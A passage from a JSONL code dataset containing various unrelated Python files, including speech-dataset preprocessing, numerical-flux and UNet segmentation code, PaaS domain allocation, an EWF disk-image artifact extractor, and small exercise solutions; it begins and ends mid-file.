queue_out.get()\r\n if utt is not None:\r\n if utt.speaker is not None:\r\n utt.speaker_id = speaker_ids[utt.speaker]\r\n\r\n # JSONL\r\n json.dump(\r\n dataclasses.asdict(utt),\r\n dataset_file,\r\n ensure_ascii=False,\r\n cls=PathEncoder,\r\n )\r\n print(\"\", 
file=dataset_file)\r\n\r\n # Signal workers to stop\r\n for proc in processes:\r\n queue_in.put(None)\r\n\r\n # Wait for workers to stop\r\n for proc in processes:\r\n proc.join(timeout=1)\r\n\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\n\r\ndef process_batch(args: argparse.Namespace, queue_in: JoinableQueue, queue_out: Queue):\r\n try:\r\n silence_detector = make_silence_detector()\r\n phonemizer = Phonemizer(default_voice=args.language)\r\n\r\n while True:\r\n utt_batch = queue_in.get()\r\n if utt_batch is None:\r\n break\r\n\r\n for utt in utt_batch:\r\n try:\r\n _LOGGER.debug(utt)\r\n utt.phonemes = phonemize(utt.text, phonemizer)\r\n utt.phoneme_ids = phonemes_to_ids(utt.phonemes)\r\n utt.audio_norm_path, utt.audio_spec_path = cache_norm_audio(\r\n utt.audio_path,\r\n args.cache_dir,\r\n silence_detector,\r\n args.sample_rate,\r\n )\r\n queue_out.put(utt)\r\n except TimeoutError:\r\n _LOGGER.error(\"Skipping utterance due to timeout: %s\", utt)\r\n except Exception:\r\n _LOGGER.exception(\"Failed to process utterance: %s\", utt)\r\n queue_out.put(None)\r\n\r\n queue_in.task_done()\r\n except Exception:\r\n _LOGGER.exception(\"process_batch\")\r\n\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\n\r\n@dataclass\r\nclass Utterance:\r\n text: str\r\n audio_path: Path\r\n speaker: Optional[str] = None\r\n speaker_id: Optional[int] = None\r\n phonemes: Optional[List[str]] = None\r\n phoneme_ids: Optional[List[int]] = None\r\n audio_norm_path: Optional[Path] = None\r\n audio_spec_path: Optional[Path] = None\r\n\r\n\r\nclass PathEncoder(json.JSONEncoder):\r\n def default(self, o):\r\n if isinstance(o, Path):\r\n return str(o)\r\n return super().default(o)\r\n\r\n\r\ndef ljspeech_dataset(\r\n dataset_dir: Path, is_single_speaker: bool, speaker_id: Optional[int] = None\r\n) -> Iterable[Utterance]:\r\n # filename|speaker|text\r\n # speaker is optional\r\n metadata_path = dataset_dir / \"metadata.csv\"\r\n assert metadata_path.exists(), f\"Missing {metadata_path}\"\r\n\r\n wav_dir = dataset_dir / \"wav\"\r\n if not wav_dir.is_dir():\r\n wav_dir = dataset_dir / \"wavs\"\r\n\r\n with open(metadata_path, \"r\", encoding=\"utf-8\") as csv_file:\r\n reader = csv.reader(csv_file, delimiter=\"|\")\r\n for row in reader:\r\n assert len(row) >= 2, \"Not enough columns\"\r\n\r\n speaker: Optional[str] = None\r\n if is_single_speaker or (len(row) == 2):\r\n filename, text = row[0], row[-1]\r\n else:\r\n filename, speaker, text = row[0], row[1], row[-1]\r\n\r\n # Try file name relative to metadata\r\n wav_path = metadata_path.parent / filename\r\n\r\n if not wav_path.exists():\r\n # Try with .wav\r\n wav_path = metadata_path.parent / f\"{filename}.wav\"\r\n\r\n if not wav_path.exists():\r\n # Try wav/ or wavs/\r\n wav_path = wav_dir / filename\r\n\r\n if not wav_path.exists():\r\n # Try with .wav\r\n wav_path = wav_dir / f\"{filename}.wav\"\r\n\r\n if not wav_path.exists():\r\n _LOGGER.warning(\"Missing %s\", filename)\r\n continue\r\n\r\n yield Utterance(\r\n text=text, audio_path=wav_path, speaker=speaker, speaker_id=speaker_id\r\n )\r\n\r\n\r\ndef mycroft_dataset(\r\n dataset_dir: Path, is_single_speaker: bool, speaker_id: Optional[int] = None\r\n) -> Iterable[Utterance]:\r\n speaker_id = 0\r\n for metadata_path in dataset_dir.glob(\"**/*-metadata.txt\"):\r\n speaker = metadata_path.parent.name if not is_single_speaker else None\r\n with open(metadata_path, \"r\", encoding=\"utf-8\") as csv_file:\r\n # 
filename|text|length\r\n reader = csv.reader(csv_file, delimiter=\"|\")\r\n for row in reader:\r\n filename, text = row[0], row[1]\r\n wav_path = metadata_path.parent / filename\r\n yield Utterance(\r\n text=text,\r\n audio_path=wav_path,\r\n speaker=speaker,\r\n speaker_id=speaker_id if not is_single_speaker else None,\r\n )\r\n speaker_id += 1\r\n\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\n\r\ndef batched(iterable, n):\r\n \"Batch data into lists of length n. The last batch may be shorter.\"\r\n # batched('ABCDEFG', 3) --> ABC DEF G\r\n if n < 1:\r\n raise ValueError(\"n must be at least one\")\r\n it = iter(iterable)\r\n batch = list(itertools.islice(it, n))\r\n while batch:\r\n yield batch\r\n batch = list(itertools.islice(it, n))\r\n\r\n\r\n# -----------------------------------------------------------------------------\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"athenasaurav/piper","sub_path":"src/python/piper_train/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":11210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42846697373","text":"import numpy as np\nfrom abc import abstractmethod\nfrom discontinuous_galerkin.base.base_numerical_flux import BaseNumericalFlux\nimport pdb\n\nclass LaxFriedrichsFlux(BaseNumericalFlux):\n \"\"\"\n Lax-Friedrichs numerical flux class.\n \n This class contains the functionality for the Lax-Friedrichs numerical flux. \n \"\"\"\n def __init__(self, DG_vars, alpha=0.5, velocity=lambda q: np.abs(q)):\n \"\"\"Initialize the class.\"\"\"\n\n super(LaxFriedrichsFlux).__init__()\n\n self.DG_vars = DG_vars\n self.alpha = alpha\n self.velocity = velocity\n\n self.nx_boundary = np.array(\n [self.DG_vars.nx[self.DG_vars.mapI], self.DG_vars.nx[self.DG_vars.mapO]]\n )\n \n def _average_operator(self, q_inside, q_outside):\n \"\"\"Compute the average operator.\"\"\"\n\n return (q_inside + q_outside) / 2\n\n def _jump_operator(self, q_inside, q_outside):\n \"\"\"Compute the jump operator.\"\"\"\n\n return self.DG_vars.nx * (q_inside - q_outside)\n \n def _boundary_jump_operator(self, q_inside, q_outside):\n \"\"\"Compute the jump operator on the boundary.\"\"\"\n\n return self.nx_boundary * (q_inside - q_outside)\n\n def compute_numerical_flux(\n self, \n q_inside, \n q_outside, \n flux_inside, \n flux_outside,\n on_boundary=False,\n primitive_to_conservative=None,\n BC_state_or_flux=None\n ):\n \"\"\"Compute the numerical flux.\"\"\"\n\n if primitive_to_conservative is not None:\n q_inside = primitive_to_conservative(q_inside)\n q_outside = primitive_to_conservative(q_outside)\n\n # Compute the velocity\n C_inside = self.velocity(q_inside)\n C_outside = self.velocity(q_outside)\n C = np.maximum(np.abs(C_inside), np.abs(C_outside))\n\n # Compute the average of the fluxes\n flux_average = self._average_operator(flux_inside, flux_outside)\n\n if on_boundary:\n\n numerical_flux = flux_average\n for i, side in enumerate(['left', 'right']):\n if BC_state_or_flux[side] == 'flux':\n numerical_flux[:, i] = flux_outside[:, i]\n else:\n q_jump = self._boundary_jump_operator(q_inside, q_outside)\n numerical_flux[:, i] += C[i] * 0.5 * (1 - self.alpha) * q_jump[:, i]\n else:\n q_jump = self._jump_operator(q_inside, q_outside)\n\n # Compute the numerical flux\n numerical_flux = flux_average + C * 0.5 * (1 - self.alpha) * q_jump\n \n return 
numerical_flux\n\n","repo_name":"nmucke/discontinuous-galerkin","sub_path":"src/discontinuous_galerkin/numerical_fluxes/lax_friedrichs.py","file_name":"lax_friedrichs.py","file_ext":"py","file_size_in_byte":2602,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"7244945321","text":"import argparse\r\nimport logging\r\nimport os\r\nimport sys\r\n\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nfrom torch import optim\r\n\r\nfrom model import UNet\r\nfrom eval_net import eval_net\r\nfrom BLR import ImgWtLossSoftNLL\r\nimport torch.nn.functional as F\r\n\r\n# from torch.utils.tensorboard import SummaryWriter\r\nfrom dataset import BasicDataset\r\nfrom torch.utils.data import DataLoader, random_split\r\n\r\ndir_img = r\"D:\\BaiduNetdiskDownload\\gen_img\"\r\ndir_mask = r\"D:\\BaiduNetdiskDownload\\gen_mask\"\r\ndir_checkpoint = r\"D:\\PycharmsProjects\\UNET+BLR\\checkPoints\"\r\n\r\nclasses = 5\r\nepochs = 5\r\nglobal_step = 0\r\nbatch_size = 4\r\nlr = 0.001\r\n\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n\r\ndataset = BasicDataset(dir_img, dir_mask)\r\nn_val = int(len(dataset) * 0.1)\r\nn_train = len(dataset) - n_val\r\ntrain, val = random_split(dataset, [n_train, n_val])\r\ntrain_loader = DataLoader(train, batch_size=batch_size, shuffle=True)\r\nval_loader = DataLoader(val, batch_size=batch_size, shuffle=False)\r\n\r\n# writer = SummaryWriter(comment=f'LR_{lr}_BS_{batch_size}_SCALE_{1}')\r\n\r\nnet = UNet(n_channels=3, n_classes=classes, bilinear=True)\r\nnet = net.cuda()\r\n\r\noptimizer = optim.Adam(net.parameters(), lr=lr, weight_decay=1e-8)\r\nscheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min' if net.n_classes > 1 else 'max', patience=2)\r\n\r\ncriterion = ImgWtLossSoftNLL(classes, epochs).cuda()\r\ncriterion_ = nn.CrossEntropyLoss().cuda()\r\n\r\n\r\nfor epoch in range(epochs):\r\n epoch_loss = 0.0\r\n for batch in train_loader:\r\n imgs = batch['image']\r\n # print(imgs.size())\r\n true_masks = batch['mask']\r\n # print(true_masks.size())\r\n imgs = imgs.to(device=device, dtype=torch.float32)\r\n mask_type = torch.float32 if net.n_classes == 1 else torch.long\r\n true_masks = true_masks.to(device=device, dtype=mask_type)\r\n\r\n masks_pred = net(imgs)\r\n # masks_pred = masks_pred.to(\"cpu\", torch.double)\r\n # print(masks_pred.size())\r\n\r\n loss = criterion(masks_pred, true_masks)\r\n # loss = criterion_(masks_pred, true_masks)\r\n # print(\"###########\")\r\n # print(loss.item())\r\n epoch_loss += loss.item()\r\n # writer.add_scalar('Loss/train', loss.item(), global_step)\r\n\r\n print(\"epoch : %d, batch : %5d, loss : %.5f\" % (epoch, (global_step / batch_size), loss.item()))\r\n optimizer.zero_grad()\r\n loss.backward()\r\n optimizer.step()\r\n\r\n global_step += 1\r\n if global_step % 1000 == 0 and global_step > 1000:\r\n val_pre = eval_net(net, val_loader, device)\r\n print(\"val loss : %.5f\" % val_pre)\r\n\r\n if epoch % 10 == 0 and epoch > 0:\r\n torch.save(net.state_dict(), os.path.join(dir_checkpoint, 'epoch_%d.pth' % epoch))\r\n","repo_name":"uptownfunkmars/Improved-Unet-Used-Boundary-Relax-Loss","sub_path":"unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"30889394338","text":"from typing import List, NamedTuple, Optional\n\nfrom paas_wl.infras.cluster.models import IngressConfig\nfrom paas_wl.infras.cluster.shim import 
EnvClusterService\nfrom paas_wl.workloads.networking.entrance.allocator.domains import Domain, SubDomainAllocator\nfrom paasng.platform.engine.constants import AppEnvName\nfrom paasng.platform.applications.models import ModuleEnvironment\n\n\nclass PreDomains(NamedTuple):\n \"\"\"Preallocated domains, include both environments\"\"\"\n\n stag: Domain\n prod: Domain\n\n\ndef get_preallocated_domains_by_env(env: ModuleEnvironment) -> List[Domain]:\n \"\"\"Get all pre-allocated domains for an environment which may not have been\n deployed yet. The result length equals the number of configured root domains.\n \"\"\"\n app = env.application\n module = env.module\n cluster = EnvClusterService(env).get_cluster()\n ingress_config = cluster.ingress_config\n\n # Iterate configured root domains, get domains\n allocator = SubDomainAllocator(app.code, ingress_config.port_map)\n results: List[Domain] = []\n for domain_cfg in ingress_config.app_root_domains:\n if not env.module.is_default:\n results.append(allocator.for_universal(domain_cfg, module.name, env.environment))\n else:\n if env.environment == AppEnvName.STAG.value:\n results.append(allocator.for_default_module(domain_cfg, 'stag'))\n else:\n results.append(allocator.for_default_module_prod_env(domain_cfg))\n return results\n\n\ndef get_preallocated_domain(\n app_code: str, ingress_config: IngressConfig, module_name: Optional[str] = None\n) -> Optional[PreDomains]:\n \"\"\"Get the preallocated domain for an application which has not been released yet.\n\n if `module_name` was not given, the result will always use the main module.\n\n :param ingress_config: The ingress config dict\n :param module_name: Name of module, optional\n :returns: when sub domain was not configured, return None\n \"\"\"\n if not ingress_config.app_root_domains:\n return None\n\n allocator = SubDomainAllocator(app_code, ingress_config.port_map)\n domain_cfg = ingress_config.default_root_domain\n if not module_name:\n return PreDomains(\n stag=allocator.for_default_module(domain_cfg, 'stag'),\n prod=allocator.for_default_module_prod_env(domain_cfg),\n )\n else:\n return PreDomains(\n stag=allocator.for_universal(domain_cfg, module_name, 'stag'),\n prod=allocator.for_universal(domain_cfg, module_name, 'prod'),\n )\n","repo_name":"TencentBlueKing/blueking-paas","sub_path":"apiserver/paasng/paasng/accessories/publish/entrance/domains.py","file_name":"domains.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"32"} +{"seq_id":"30014291607","text":"\ndef even_or_odd(s):\n I=[int(x) for x in s]\n E=[x for x in I if x%2==0]\n O=[x for x in I if x%2]\n if sum(E)==sum(O):\n return 'Even and Odd are the same'\n elif sum(E)>sum(O):\n return 'Even is greater than Odd'\n else:\n return 'Odd is greater than Even'\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"suhHcPgaKdb9YCrve_6.py","file_name":"suhHcPgaKdb9YCrve_6.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5097526384","text":"import os\nimport pandas as pd\nfrom dateutil.relativedelta import relativedelta\n\n\ndef merge(path, dataid, start, duration):\n destination = os.path.join(os.getcwd(), 'data', 'NYISO')\n files = os.listdir(path)\n files.sort()\n\n date_list = []\n for d in range(duration):\n date = start + relativedelta(days=d)\n datestring = str(date.year) + '{:02d}'.format(date.month) + '{:02d}'.format(date.day)\n 
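# one YYYYMMDD stamp per day in the requested window\n 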
date_list.append(datestring)\n\n selected_files = []\n for f in files:\n if f[0:8] in date_list:\n selected_files.append(f)\n\n if len(selected_files[0].split('_')) > 1:\n suffix = selected_files[0].split('_')[-1].split('.')[0]\n else:\n suffix = ''\n\n combined_csv = pd.concat([pd.read_csv(os.path.join(path, f)) for f in selected_files])\n os.chdir(destination)\n if len(suffix) > 0:\n combined_csv.to_csv('{}_to_{}_{}_{}.csv'.format(date_list[0], date_list[-1], dataid, suffix), index=False)\n\n else:\n combined_csv.to_csv('{}_to_{}_{}.csv'.format(date_list[0], date_list[-1], dataid), index=False)\n","repo_name":"LLNL/ISO-DART","sub_path":"lib/framework/NYISO/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"32"} +{"seq_id":"24276311878","text":"__author__ = 'guinnc'\nclass ErrorInLine:\n 'Stores the original line, the line number, and the error message'\n\n def __init__(self, originalLine, lineNo, errorMessage):\n 'Store one line together with its number and error message'\n self.original = originalLine\n self.lineNumber = lineNo\n self.error = errorMessage\n self.PRINTED = False\n\n def __str__(self):\n 'a pretty string form of the line'\n return self.original# + \"\\t# \" + self.error\n","repo_name":"guinnc/LinterForMDT","sub_path":"ErrorInLine.py","file_name":"ErrorInLine.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35110077147","text":"\"\"\"\nThis module represents the Consumer.\n\nComputer Systems Architecture Course\nAssignment 1\nMarch 2021\n\"\"\"\n\nfrom threading import Thread\nfrom time import sleep\n\n\nclass Consumer(Thread):\n \"\"\"\n Class that represents a consumer.\n \"\"\"\n\n def __init__(self, carts, marketplace, retry_wait_time, **kwargs):\n \"\"\"\n Constructor.\n\n :type carts: List\n :param carts: a list of add and remove operations\n\n :type marketplace: Marketplace\n :param marketplace: a reference to the marketplace\n\n :type retry_wait_time: Time\n :param retry_wait_time: the number of seconds that a producer must wait\n until the Marketplace becomes available\n\n :type kwargs:\n :param kwargs: other arguments that are passed to the Thread's __init__()\n \"\"\"\n Thread.__init__(self, **kwargs)\n self.carts = carts\n self.marketplace = marketplace\n self.wait_time = retry_wait_time\n\n def run(self):\n for cart in self.carts:\n # register each cart from the list\n cart_id = self.marketplace.new_cart()\n # run every action in the cart by calling the matching marketplace methods\n for action in cart:\n if action['type'] == 'add':\n for _ in range(action['quantity']):\n while not self.marketplace.add_to_cart(cart_id, action['product']):\n sleep(self.wait_time)\n else:\n for _ in range(action['quantity']):\n self.marketplace.remove_from_cart(cart_id, action['product'])\n # fetch the cart's product list once every action has run\n shopping_cart = self.marketplace.place_order(cart_id)\n # print it with the consumer's name in front\n for product in shopping_cart:\n print(self.name + \" bought \" + str(product))\n","repo_name":"alexandru-vasilescu/Marketplace-multithreading","sub_path":"skel/tema/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13975338860","text":"# Simplified unet for fault 
segmentation\n# The original u-net architecture is more complicated than necessary \n# for our task of fault segmentation.\n# We significantly reduce the number of layers and features at each \n# layer to save GPU memory and computation but still preserve high \n# performance in fault segmentation.\n\nimport numpy as np \nimport os\nimport skimage.io as io\nimport skimage.transform as trans\nfrom keras.models import *\nfrom keras.layers import *\nfrom keras.optimizers import *\nfrom keras.callbacks import ModelCheckpoint, LearningRateScheduler\nfrom keras import backend as keras\n\ndef unet(pretrained_weights = None,input_size = (None,None,None,1)):\n nf1 = 32\n nf2 = nf1*2\n nf3 = nf2*2\n nf4 = nf3*2\n nf5 = nf4*2\n input_img = Input(shape=input_size,name='input_image')\n conv1 = Conv3D(nf1, (3,3,3), activation='relu', padding='same')(input_img)\n conv1 = Conv3D(nf1, (3,3,3), activation='relu', padding='same')(conv1)\n pool1 = MaxPooling3D(pool_size=(2,2,2))(conv1)\n\n conv2 = Conv3D(nf2, (3,3,3), activation='relu', padding='same')(pool1)\n conv2 = Conv3D(nf2, (3,3,3), activation='relu', padding='same')(conv2)\n pool2 = MaxPooling3D(pool_size=(2,2,2))(conv2)\n\n conv3 = Conv3D(nf3, (3,3,3), activation='relu', padding='same')(pool2)\n conv3 = Conv3D(nf3, (3,3,3), activation='relu', padding='same')(conv3)\n pool3 = MaxPooling3D(pool_size=(2,2,2))(conv3)\n\n conv4 = Conv3D(nf4, (3,3,3), activation='relu', padding='same')(pool3)\n conv4 = Conv3D(nf4, (3,3,3), activation='relu', padding='same')(conv4)\n pool4 = MaxPooling3D(pool_size=(2,2,2))(conv4)\n\n conv5 = Conv3D(nf5, (3,3,3), activation='relu', padding='same')(pool4)\n conv5 = Conv3D(nf5, (3,3,3), activation='relu', padding='same')(conv5)\n\n up6 = concatenate([UpSampling3D(size=(2,2,2))(conv5), conv4], axis=-1)\n conv6 = Conv3D(nf4, (3,3,3), activation='relu', padding='same')(up6)\n conv6 = Conv3D(nf4, (3,3,3), activation='relu', padding='same')(conv6)\n\n up7 = concatenate([UpSampling3D(size=(2,2,2))(conv6), conv3], axis=-1)\n conv7 = Conv3D(nf3, (3,3,3), activation='relu', padding='same')(up7)\n conv7 = Conv3D(nf3, (3,3,3), activation='relu', padding='same')(conv7)\n\n up8 = concatenate([UpSampling3D(size=(2,2,2))(conv7), conv2], axis=-1)\n conv8 = Conv3D(nf2, (3,3,3), activation='relu', padding='same')(up8)\n conv8 = Conv3D(nf2, (3,3,3), activation='relu', padding='same')(conv8)\n\n up9 = concatenate([UpSampling3D(size=(2,2,2))(conv8), conv1], axis=-1)\n conv9 = Conv3D(nf1, (3,3,3), activation='relu', padding='same')(up9)\n conv9 = Conv3D(nf1, (3,3,3), activation='relu', padding='same')(conv9)\n\n o1 = Conv3D(1, (1,1,1), activation='sigmoid',name='o1')(conv9)\n\n model = Model(inputs=input_img, outputs=o1)\n model.compile(optimizer = Adam(lr = 1e-4),loss ='binary_crossentropy', metrics = ['accuracy'])\n\n return model\n\n","repo_name":"xinwucwp/KarstSeg3D","sub_path":"unet/unet3.py","file_name":"unet3.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"32"} +{"seq_id":"40219207514","text":"\"\"\"This file contains everything related to the actual EWF\nhandling.\n\nIt opens up the image, finds the NTFS image and iterates\nover files using ArtifactExtractor derived classes to extract\nuseful artifacts and passes them over to the related modules.\n\"\"\"\n\nimport os\nimport sys\nimport csv\nimport subprocess\nfrom datetime import datetime\n\nimport pytsk3\nimport pyewf\n\n# Stolen from the Python Forensics Cookbook\n# 
https://github.com/PacktPublishing/Python-Digital-Forensics-Cookbook\nclass EWFImgInfo(pytsk3.Img_Info):\n \"\"\"This class represents an EWF image and contains everything needed\n by the rest of the project.\"\"\"\n def __init__(self, ewf_handle):\n self._ewf_handle = ewf_handle\n super(EWFImgInfo, self).__init__(url=\"\",\n type=pytsk3.TSK_IMG_TYPE_EXTERNAL)\n\n def close(self):\n self._ewf_handle.close()\n\n def read(self, offset, size):\n self._ewf_handle.seek(offset)\n return self._ewf_handle.read(size)\n\n def get_size(self):\n return self._ewf_handle.get_media_size()\n\ndef find_file_systems(img_info: EWFImgInfo) -> list[pytsk3.FS_Info]:\n \"\"\"\n This function finds the various filesystems in a given EWF image.\n \"\"\"\n vol = pytsk3.Volume_Info(img_info)\n fs_partitions = []\n\n print(\"[+] Iterating over partitions to find NTFS file systems\\n\")\n for part in vol:\n try:\n fs_offset = part.start * vol.info.block_size\n fs = pytsk3.FS_Info(img_info, offset=fs_offset)\n fs_info = fs.info # TSK_FS_INFO\n if (fs_info.ftype != pytsk3.TSK_FS_TYPE_NTFS):\n print(\"[-] Skipping non-NTFS partition at {}\".format(fs_offset))\n continue\n print(\"[+] Found NTFS partition at offset \" + str(fs_offset))\n fs_partitions.append(fs)\n except IOError:\n _, e, _ = sys.exc_info()\n if \"file system type\" in str(e):\n print(\"[-] Unable to open FS, unrecognized type at {}\".format(fs_offset))\n continue\n\n return fs_partitions\n\n\ndef recurse_files(fs, root_dir, dirs, parent, extractors):\n \"\"\"\n This function performs a recursive search over a filesystem\n :meta private:\n \"\"\"\n dirs.append(root_dir.info.fs_file.meta.addr)\n for fs_object in root_dir:\n # Skip \".\", \"..\" or directory entries without a name.\n if not hasattr(fs_object, \"info\") or \\\n not hasattr(fs_object.info, \"name\") or \\\n not hasattr(fs_object.info.name, \"name\") or \\\n fs_object.info.name.name in [\".\", \"..\"]:\n continue\n try:\n # Set whether fs_object is file or directory\n try:\n if fs_object.info.meta.type == pytsk3.TSK_FS_META_TYPE_DIR:\n f_type = b\"DIR\"\n file_ext = b\"\"\n else:\n f_type = b\"FILE\"\n file_name = fs_object.info.name.name\n\n if b\".\" in file_name:\n file_ext = file_name.rsplit(b\".\")[-1].lower()\n else:\n file_ext = b\"\"\n\n for extractor in extractors:\n if file_name.decode(\"utf-8\").lower() in extractor.processable_file_names:\n file_path = b\"\\\\\".join(parent[1:])\n extractor.process_fs_object(fs_object, file_path)\n\n except AttributeError:\n continue\n\n if f_type == b\"DIR\" and fs_object.info.name.name not in (b\"..\", b\".\"):\n current_path = b\"\\\\\".join(parent[1:])\n folder_name = fs_object.info.name.name\n\n for extractor in extractors:\n if folder_name.decode(\"utf-8\").lower() in extractor.processable_directories:\n folder_path = b\"\\\\\".join(parent[1:])\n extractor.process_fs_object(fs_object, folder_path)\n\n # Check if any extractor's starting path starts with the current directory path\n should_recurse = (any(\n extractor.starting_path.startswith(current_path.decode(\"utf-8\").lower())\n or extractor.starting_path == \"\"\n for extractor in extractors\n ))\n\n if should_recurse:\n parent.append(fs_object.info.name.name)\n sub_directory = fs_object.as_directory()\n inode = fs_object.info.meta.addr\n\n # This ensures that we don't recurse into a directory\n # above the current level and thus avoid circular loops.\n if inode not in dirs:\n recurse_files(fs, sub_directory, dirs, parent, extractors)\n parent.pop(-1)\n\n except IOError:\n continue\n 
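# all entries processed: pop this directory from the visited-inode list\n 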
dirs.pop(-1)\n\ndef find_file(path, fs, root_dir):\n \"\"\"\n Recursively search for a file with the given path\n \"\"\"\n components = path.split(b'/')\n for fs_object in root_dir:\n if fs_object.info.name.name == components[0]:\n if len(components) == 1:\n # Found the file, return the fs_object\n return fs_object\n elif fs_object.info.meta.type == pytsk3.TSK_FS_META_TYPE_DIR:\n # Recurse into the directory\n sub_dir = fs_object.as_directory()\n inode = fs_object.info.meta.addr\n return find_file(b'/'.join(components[1:]), fs, sub_dir)\n # If we get here, the file was not found\n return None\n","repo_name":"CTM1/win_ewf_extract","sub_path":"modules/disk_utils.py","file_name":"disk_utils.py","file_ext":"py","file_size_in_byte":5612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1110954547","text":"#!/usr/bin/env python\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport dicom\n\nfrom skimage.filters import threshold_otsu\n\nmatplotlib.rcParams['font.size'] = 9\n\nds = dicom.read_file(\"/Users/Mariana/Desktop/CT-0015.dcm\")\nimage = ds.pixel_array\nthresh = threshold_otsu(image)\nbinary = image > thresh\n\nfig = plt.figure(figsize=(8, 2.5))\nax1 = plt.subplot(1, 3, 1, adjustable='box-forced')\nax2 = plt.subplot(1, 3, 2)\nax3 = plt.subplot(1, 3, 3, sharex=ax1, sharey=ax1, adjustable='box-forced')\n\n\nax1.imshow(image, cmap=plt.cm.gray)\nax1.set_title('Original')\nax1.axis('off')\n\nax2.hist(image.ravel())\nax2.set_title('Histogram')\nax2.axvline(thresh, color='r')\n\nax3.imshow(binary, cmap=plt.cm.gray)\nax3.set_title('Threshold')\nax3.axis('off')\n\nplt.show()\n","repo_name":"marianamioto/lung-img-studies","sub_path":"old/teste3a.py","file_name":"teste3a.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30074501877","text":"\"\"\"\r\n\n\nPython offers some bit operations but not bit rotation. To complete that,\ncreate a function that takes three parameters:\n\n 1. `n`: Integer, which in binary representation should be rotated.\n 2. `m`: Number of rotation steps that should be performed.\n 3. 
`d`: Boolean value; `True` = rotation right, `False` = rotation left.\n\nYour function should return an integer as a result of its rotated binary\nrepresentation.\n\n### Examples\n\n bit_rotate(8, 1, True) ➞ 4\n # 8 in bin: 1000, rotated 1 step to the right: 0100, in dec: 4\n \n bit_rotate(16, 1, False) ➞ 1\n # 16 in bin: 10000, rotated 1 step to the left: 00001, in dec: 1\n \n bit_rotate(17, 2, False) ➞ 6\n # 17 in bin: 10001, rotated 2 steps to the left: 00110, in dec: 6\n\n### Notes\n\n * For parameters use unsigned integers only.\n * There is a solution with string operations and combined bit operations.\n\n\"\"\"\r\n\ndef bit_rotate(n, m, d):\n # Get binary values (as string)\n binary = str(bin(n))[2:]\n # Get the new indexes: take into account if d = True or False\n indexes = [i%len(binary) for i in range(-len(binary)-m, 0-m)] if d else [i%len(binary) for i in range(0+m, len(binary)+m)] \n # Make the new rotated binary value based on the indexes\n rotated = \"\".join([str(binary[i]) for i in indexes])\n \n return int(rotated, 2)\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"Jjbbjqm3JuA6WnPYH_6.py","file_name":"Jjbbjqm3JuA6WnPYH_6.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2283197453","text":"import spacy, pycrfsuite, re\n\ndef create_feature(doc, i):\n token = doc[i][0]\n token_tag = doc[i][1]\n features = [\n 'token.lower=' + token.lower(),\n 'token.length=' + str(len(token)),\n 'token.isupper=%s' % token.isupper(),\n 'token.istitle=%s' % token.istitle(),\n 'token.isdigit=%s' % token.isdigit(),\n 'token.isdot=%s' % isdot(token),\n 'token_tag=%s' % token_tag,\n 'token_tag[:2]=%s' % token_tag[:2]\n ]\n if i > 0:\n last_token = doc[i-1][0]\n last_token_tag = doc[i-1][1]\n features.extend([\n '-1:token.lower=' + last_token.lower(),\n '-1:token.length=' + str(len(last_token)),\n '-1:token.isupper=%s' % last_token.isupper(),\n '-1:token.istitle=%s' % last_token.istitle(),\n '-1:token.isdigit=%s' % last_token.isdigit(),\n '-1:token.isdot=%s' % isdot(last_token),\n '-1:token_tag=%s' % last_token_tag,\n '-1:token_tag[:2]=%s' % last_token_tag[:2], \n 'last|token=%s|%s' %(last_token,token)\n ]) \n else:\n features.append('BOS') \n if i < len(doc)-1:\n next_token = doc[i+1][0]\n next_token_tag = doc[i+1][1]\n features.extend([\n '+1:token.lower=' + next_token.lower(),\n '+1:token.length=' + str(len(next_token)),\n '+1:token.isupper=%s' % next_token.isupper(),\n '+1:token.istitle=%s' % next_token.istitle(),\n '+1:token.isdigit=%s' % next_token.isdigit(),\n '+1:token.isdot=%s' % isdot(next_token),\n '+1:token_tag=%s' % next_token_tag,\n '+1:token_tag[:2]=%s' % next_token_tag[:2], \n 'token|next=%s|%s' %(token,next_token), \n ])\n else:\n features.append('EOS')\n \n if i < len(doc)-2:\n next_token = doc[i+2][0]\n next_token_tag = doc[i+2][1]\n features.extend([\n '+2:token.lower=' + next_token.lower(),\n '+2:token.length=' + str(len(next_token)),\n '+2:token.isupper=%s' % next_token.isupper(),\n '+2:token.istitle=%s' % next_token.istitle(),\n '+2:token.isdigit=%s' % next_token.isdigit(),\n '+2:token.isdot=%s' % 